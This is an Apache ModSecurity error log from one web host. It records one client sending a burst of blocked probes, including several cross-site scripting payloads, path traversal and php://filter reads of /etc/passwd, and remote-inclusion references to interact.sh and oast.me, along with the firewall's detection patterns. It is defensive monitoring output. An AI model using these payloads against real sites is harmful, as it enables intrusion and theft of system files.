[Tue Aug 29 11:53:04.884521 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh?a=https://interact.sh found within TX:1: interact.sh?a=https://interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-json/anycomment/v1/auth/wordpress"] [unique_id "ZO15sMCo-f0AAAoZ6SMAAAAK"]
[Tue Aug 29 11:53:06.052797 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15ssCo-f0AAAlUl0IAAAA0"]
[Tue Aug 29 11:53:07.561262 2023] [:error] [pid 2585] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:profile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:profile: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/magmi/web/magmi.php"] [unique_id "ZO15s8Co-f0AAAoZ6SYAAAAK"]
[Tue Aug 29 11:53:08.263301 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAoesLEAAAAV"]
[Tue Aug 29 11:53:08.363424 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22; found within ARGS:p: \\x22;alert(document.domain);\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tMCo-f0AAAog@CEAAAAY"]
[Tue Aug 29 11:53:08.621678 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:q: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/data/autosuggest-remote.php"] [unique_id "ZO15tMCo-f0AAAot8MIAAAAn"]
[Tue Aug 29 11:53:09.573004 2023] [:error] [pid 2600] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tcCo-f0AAAoocwQAAAAh"]
[Tue Aug 29 11:53:10.429580 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tsCo-f0AAAni-BkAAAAU"]
[Tue Aug 29 11:53:11.797226 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15t8Co-f0AAAoesLoAAAAV"]
[Tue Aug 29 11:53:12.028231 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAoqbPcAAAAj"]
[Tue Aug 29 11:53:12.102487 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15uMCo-f0AAAnd3QkAAAAI"]
[Tue Aug 29 11:53:12.825516 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAnTlaQAAAAA"]
[Tue Aug 29 11:53:14.460132 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAofm5cAAAAX"]
[Tue Aug 29 11:53:14.631375 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAoW7N0AAAAJ"]
[Tue Aug 29 11:53:15.768979 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAnd3Q4AAAAI"]
[Tue Aug 29 11:53:16.667901 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAowNnAAAAAH"]
[Tue Aug 29 11:53:17.674686 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAolKVIAAAAe"]
[Tue Aug 29 11:53:18.721182 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15vsCo-f0AAAog@D4AAAAY"]
[Tue Aug 29 11:53:18.737095 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAnTlb0AAAAA"]
[Tue Aug 29 11:53:19.845366 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAot8OYAAAAn"]
[Tue Aug 29 11:53:19.943009 2023] [:error] [pid 2595] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAojaqMAAAAb"]
[Tue Aug 29 11:53:20.537040 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAn404oAAAAW"]
[Tue Aug 29 11:53:21.664848 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAoqbRoAAAAj"]
[Tue Aug 29 11:53:22.536663 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15wsCo-f0AAAofm7EAAAAX"]
[Tue Aug 29 11:53:22.547926 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wsCo-f0AAAoesNwAAAAV"]
[Tue Aug 29 11:53:23.387467 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAoLfSwAAAAG"]
[Tue Aug 29 11:53:24.124622 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15xMCo-f0AAAowNokAAAAH"]
[Tue Aug 29 11:53:24.695148 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAo0gNcAAAAZ"]
